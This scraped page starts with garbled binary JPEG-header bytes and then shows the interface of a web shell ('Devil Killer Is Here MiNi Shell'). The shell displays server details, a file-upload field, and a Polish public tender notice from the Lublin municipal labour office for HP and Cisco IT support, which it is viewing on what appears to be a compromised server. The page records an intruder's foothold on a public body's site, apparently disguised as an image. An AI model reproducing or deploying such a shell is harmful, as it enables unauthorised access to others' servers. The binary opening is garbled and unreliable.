JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230629/0028166201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wsparcie serwisowe dla urządzeń IT </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Urząd Pracy w Lublinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431213647</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Niecała 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-080</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">814665200</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">814665201</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetarg@mup.lublin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://muplublin.praca.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wsparcie serwisowe dla urządzeń IT </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-27c3d218-0120-11ee-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00281662</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00080955/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 wsparcie serwisowe na urządzenia HP (serwery i biblioteka taśmowa)</p> <p class="mb-0">1.3.3 wsparcie serwisowe dla switchy Cisco i router</p> <p class="mb-0">1.3.4 wsparcie serwisowe dla urządzeń UTM</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-27c3d218-0120-11ee-b70f-ae2d9e28ec7b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-27c3d218-0120-11ee-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między<br/>Zamawiającym, a Wykonawcami odbywa się elektronicznie przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto podmiotu „Wykonawca” na Platformie e-<br/>Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-<br/>Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej:<br/>https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>2.Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych<br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz.U z 2020r. poz. 2452).<br/>4. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów, o którym mowa w pkt 11.6,<br/>sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 12<br/>kwietnia 2012r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji<br/>w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz.U. z 2017r. poz. 2247) z<br/>uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki.<br/>W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>5. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów, o którym<br/>mowa w pkt 11.6, w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci<br/>elektronicznej:<br/>a) w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i<br/>przekazuje się jako załącznik),<br/>lub<br/>b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>6. W celu prawidłowego korzystania z usług Platformy e-Zamówienia wymagany jest:<br/>a) Komputer PC<br/>- parametry minimum: Intel Core2 Duo, 2 GB RAM, HDD<br/>- zainstalowany jeden z poniższych systemów operacyjnych: MS Windows 7 lub nowszy OSX/Mac OS10.10, Ubuntu 14.04,<br/>- zainstalowana jedna z poniższych przeglądarek: Chrome 66.0 lub nowsza, Firefox 59.0 lub nowszy, Safari 11.1 lub nowsza, Edge<br/>14.0 i nowsze,<br/>albo<br/>a) Tablet/Telefon<br/>- Parametry minimum: 4 rdzenie procesora, 2GB RAM, Android 6.0 Marshmallow, iOS 10.3<br/>- Przeglądarka Chrome 61 lub nowa<br/>7. Dla skorzystania z pełnej funkcjonalności może być konieczne włączenie w przeglądarce obsługi protokołu bezpiecznej transmisji<br/>danych SSL, obsługi Java Script, oraz cookies;<br/>Szczegółowe informacje są zawarte w Rozdziale 11 i Rozdziale 13 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest<br/>Miejski Urząd Pracy w Lublinie (zwany dalej MUP w Lublinie) reprezentowany przez Dyrektora MUP w<br/>Lublinie, pod adresem ul. Niecała 14, 20-080 Lublin.2. Z Inspektorem Ochrony Danych MUP w Lublinie<br/>można skontaktować się pod numerem telefonu (81) 466-52-72, e-mail: iod@mup.lublin.pl lub listownie<br/>na ww. adres siedziby Administratora.3. Pani/Pana dane osobowe są przetwarzane w następujących celach:a) Zgodnie z art. 6 ust. 1 lit. c) lub f) w celu przeprowadzenia niniejszego postępowania o<br/>udzielenie zamówienia publicznego zgodnie z ustawą z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych;b) Zgodnie z art. 6 ust. 1 lit. c) w związku z realizacją obowiązków ustawowych<br/>wynikających z ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;c) Zgodnie z art. 6 ust.<br/>1 lit. b) RODO w celu zawarcia i realizacji umowy, której stroną jest osoba, której dane dotyczą;d)<br/>Zgodnie z art. 6 ust. 1 lit. c) RODO w związku z realizacją obowiązku prawnego ciążącego na<br/>Administratorze, w szczególności wynikającym z ustawy z dnia 14 lipca 1983 r. o narodowym zasobie<br/>archiwalnym i archiwach.4. Pani/Pana dane osobowe mogą zostać przekazane organom władzy<br/>publicznej oraz podmiotom wykonującym zadania publiczne lub działającym na zlecenie organów<br/>władzy publicznej, w zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego<br/>prawa lub innym podmiotom świadczącym usługi Administratorowi na podstawie podpisanych umów.5.<br/>Administrator nie będzie przekazywał danych osobowych do państw trzecich lub do organizacji<br/>międzynarodowej.6. Pani/Pana dane przetwarzane w związku z celami wymienionymi w pkt 3 lit. a), b) i<br/>d) będą przechowywane przez okres prowadzenia postępowania o udzielenie zamówienia publicznego<br/>oraz po jego zakończeniu zgodnie z Instrukcją Kancelaryjną i Jednolitym Rzeczowym Wykazem Akt<br/>MUP w Lublinie (dostęp: https://biuletyn.lublin.eu/mup/sposoby-przyjmowania-i-zalatwianiaspraw/<br/>instrukcja-kancelaryjna,1,1820,1.html) na podstawie ustawy z dnia 14 lipca 1983 r. o narodowym<br/>zasobie archiwalnym i archiwach. W przypadku przetwarzania Pani/Pana danych w związku z celami<br/>wymienionymi w pkt 3 lit. c) i d) będą one przechowywane przez okres trwania umowy, okres realizacji<br/>umowy oraz wynikających z jej tytułu roszczeń oraz upływu okresu na jaki została udzielona gwarancja<br/>(przysługuje rękojmia). 7. Posiada Pani/Pan prawo do żądania od Administratora dostępu do swoich<br/>danych osobowych na podstawie art. 15 RODO oraz do ich sprostowania na podstawie art. 16 RODO.<br/>Na podstawie art. 18 RODO posiada Pani/Pan prawo żądania od Administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO<br/>z tym, że wystąpienie z takim żądaniem nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia postępowania o udzielenie zamówienia publicznego. Ponadto posiada Pani/Pan prawo do<br/>sprzeciwu na podstawie art. 21 RODO, wobec przetwarzania danych osobowych, z wyłączeniem<br/>sytuacji gdy podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c)<br/>RODO.8. Ma Pani/Pan prawo wniesienia skargi do organu nadzorczego zajmującego się ochroną danych osobowych, tj. Prezesa<br/>Urzędu Ochrony Danych Osobowych.9. W związku z art. 17 ust. 3 lit.<br/>b), d) lub e) RODO nie przysługuje Pani/Panu prawo do usunięcia danych osobowych oraz prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO.10. Administrator przetwarza<br/>podane dane osobowe w celu realizacji obowiązku ustawowego. Podanie danych osobowych jest<br/>dobrowolne, lecz odmowa ich podania skutkuje brakiem możliwości przeprowadzenia postępowania o<br/>udzielenie zamówienia publicznego oraz zawarcia i realizacji umowy.11. Pani/Pana dane osobowe nie<br/>będą wykorzystywane do zautomatyzowanego podejmowania decyzji, w tym profilowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MUP.PK III.371.38.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wsparcie serwisowe dla urządzeń HP<br/>Roczne wsparcie techniczne dla urządzeń HP wymienionych poniżej<br/>Lp	/Part Number usługi	/Data od której ma obowiązywać umowa	/Numer seryjny urządzenia dla którego kupowana jest usługa<br/>1	/H6HB7PE	/01.01.2024/	CZJ64336XC<br/>2	/U2WG9PE/	14 dni od dnia podpisania umowy/	GB8950CE1N1<br/>3	/U2KH6PE	/01.09.2023	/CN8947A0A8<br/>4	/U2KH6PE	/01.09.2023/	CN8947A09K<br/>5	/U2UH7PE	/07.08.2023/	CZ3729E2YH<br/>6	/U2UH7PE/	20.01.2024	/CZ20510HRY<br/>7	/U2UH7PE	/20.01.2024	/CZ20510HRZ<br/>8	/U3BF0PE/	07.08.2023	/DEC237034V2<br/><br/>1 obejmuje również następujące elementy:<br/>1.	588603-B21 HP 2400W 80 PLUS PLATINUM S/N 5BGXF0AHL650IN<br/>2.	588603-B21 HP 2400W 80 PLUS PLATINUM S/N 5BGXF0AHL650IU <br/>3.	588603-B21 HP 2400W 80 PLUS PLATINUM S/N 5BGXF0AHL650G0<br/>4.	588603-B21 HP 2400W 80 PLUS PLATINUM S/N 5BGXF0AHL650HR<br/>5.	588603-B21 HP 2400W 80 PLUS PLATINUM S/N 5BGXF0AHL650IV<br/>6.	588603-B21 HP 2400W 80 PLUS PLATINUM S/N 5BGXF0AHL650IT<br/>7.	456204-B21 Onboard Administratora OB9BBP3181<br/><br/>2 po aktualizacji zawiera napędy dla których powinno być zaoferowane wsparcie:<br/>1.	HP Ultrium-6 S/N HUJ6346PTE<br/>2.	HP Ultrium-6 S/N HUJ7399AGB<br/><br/>1.	Potwierdzenie aktywności (certyfikaty) poszczególnych usług od dat podanych w powyższej tabeli pkt 1, 2, 3, 4, 6 i 7, powinny być dostarczone Zamawiającemu, w formie pisemnej, do miejsca spełnienia świadczenia, którym jest siedziba Zamawiającego, mieszcząca się pod adresem Miejski Urząd Pracy w Lublinie, ul. Niecała 14, 20-080 Lublin, do pomieszczenia wskazanego przez Zamawiającego lub drogą elektroniczną na adres e- mail : admin@mup.lublin.pl, <br/>w terminie nie później niż 14 dni przed datą od której dana usługa ma być aktywna. <br/><br/>2.	Potwierdzenie aktywności (certyfikaty) poszczególnych usług od dat podanych w powyższej tabeli pkt 5 i 8, powinny być dostarczone Zamawiającemu, w formie pisemnej, do miejsca spełnienia świadczenia, którym jest siedziba Zamawiającego, mieszcząca się pod adresem Miejski Urząd Pracy w Lublinie, ul. Niecała 14, 20-080 Lublin, do pomieszczenia wskazanego przez Zamawiającego lub drogą elektroniczną na adres e- mail : admin@mup.lublin.pl, w terminie nie później niż 2 dni przed datą od której dana usługa ma być aktywna. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72611000-6 - Usługi w zakresie wsparcia technicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72250000-2 - Usługi w zakresie konserwacji i wsparcia systemów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1. Kryteria oceny ofert dotyczące Części I zamówienia<br/><br/>17.1.1. Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert: <br/><br/>a)	Kryterium „cena” (C): waga 100%<br/><br/>a) Wartość punktowa kryterium „cena” (C):<br/><br/>C = Cn / Co x 100 pkt x 100 %<br/><br/>gdzie:	<br/>	Cn - najniższa ofertowa cena brutto spośród ocenianych ważnych ofert<br/>	Co - cena oferty ocenianej<br/><br/>Wykonawca może otrzymać w tym kryterium maksymalnie 100 punktów.<br/><br/>17.1.2. Zamawiający wybierze jako najkorzystniejsza ofertę, która otrzyma najwyższą liczbę punktów w ramach kryteriów oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wsparcie serwisowe dla urządzeń Cisco<br/>Usługa wsparcia (Smartnet 8x5xNBD) dla poniższych urządzeń:<br/>L.p./ Nazwa	/Numer seryjny	/Data początku wsparcia	/Data końca wsparcia<br/>1.Cisco WS-C2960X-48FPD-L	/FCW2221A1K2	/25.08.2023	/24.08.2024<br/>2. Switch Cisco Catalyst 3650 WS-C3650-48TD/	FDO1906E0FE	/01.12.2023	/30.11.2024<br/>3. Switch Cisco Catalyst 3650 WS-C3650-48TD/	FDO1906E1DS	/01.12.2023	/30.11.2024<br/>4. Switch Cisco Nexus 3172TQ	/FOC2126R019/	01.12.2023/	30.11.2024<br/>5. Cisco Catalyst C9200L-24T-4X-E/	FOC253432GS/	01.12.2023/	30.11.2024<br/>6. Cisco Catalyst C9200-NM-4G/	JAE23290UD5/	01.12.2023/	30.11.2024<br/><br/>1.	Wykonawca w ramach wykonania przedmiotu Umowy wskazanego w pkt 2-6 powyższej tabeli, jest zobowiązany do dostarczenia dokumentów ( kontraktów), potwierdzających przedłużenie ważności oprogramowania, w formie pisemnej, do miejsca spełnienia świadczenia, którym jest siedziba Zamawiającego, mieszcząca się pod adresem Miejski Urząd Pracy w Lublinie, ul. Niecała 14, 20-080 Lublin, do pomieszczenia wskazanego przez Zamawiającego lub drogą elektroniczną na adres e-mail: admin@mup.lublin.pl., w terminie: nie później niż 14 dni przed datą od której dana usługa ma być aktywna.<br/>2.	Wykonawca w ramach wykonania przedmiotu Umowy, wskazanego w pkt 1 powyższej tabeli, jest zobowiązany do dostarczenia dokumentów ( kontraktów), potwierdzających przedłużenie ważności oprogramowania, w formie pisemnej, do miejsca spełnienia świadczenia, którym jest siedziba Zamawiającego, mieszcząca się pod adresem Miejski Urząd Pracy w Lublinie, ul. Niecała 14, 20-080 Lublin, do pomieszczenia wskazanego przez Zamawiającego lub drogą elektroniczną na adres e-mail: admin@mup.lublin.pl., w terminie: nie później niż 2 dni przed datą od której dana usługa ma być aktywna.<br/>3.	Zgłoszenia serwisowe będą realizowane za pośrednictwem dostawcy wsparcia na podany w umowie numer telefonu i/lub adres poczty elektronicznej. W ofercie należy podać czas reakcji serwisowej w pełnych godzinach. Dostarczone kontrakty należy przypisać w systemie Cisco Service Contract Center do konta admin@mup. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72611000-6 - Usługi w zakresie wsparcia technicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72250000-2 - Usługi w zakresie konserwacji i wsparcia systemów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.2. Kryteria oceny ofert dotyczące Części II zamówienia<br/><br/>17.2.1. Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert: <br/><br/>a)	Kryterium „cena” (C): waga 60%<br/>b)	Kryterium „czas reakcji serwisowej w pełnych godzinach” (T): waga 40%<br/><br/>a) Wartość punktowa kryterium „cena” (C):<br/><br/>C = Cn / Co x 100 pkt x 60%<br/><br/>gdzie:	<br/>	Cn - najniższa ofertowa cena brutto spośród ocenianych ważnych ofert<br/>	Co - cena oferty ocenianej<br/><br/>Wykonawca może otrzymać w tym kryterium maksymalnie 60 punktów.<br/><br/>b) Wartość punktowa kryterium „czas reakcji serwisowej w pełnych godzinach” ( T ):<br/><br/>czas reakcji serwisowej w pełnych godzinach: 4 godziny lub mniej	/	Przyznawane punkty: 40<br/><br/>czas reakcji serwisowej w pełnych godzinach: powyżej 4 godzin	/ Przyznawane punkty: 1<br/><br/>Wykonawca może otrzymać w tym kryterium maksymalnie 40 punktów<br/><br/>Ocena końcowa oferty to suma punktów 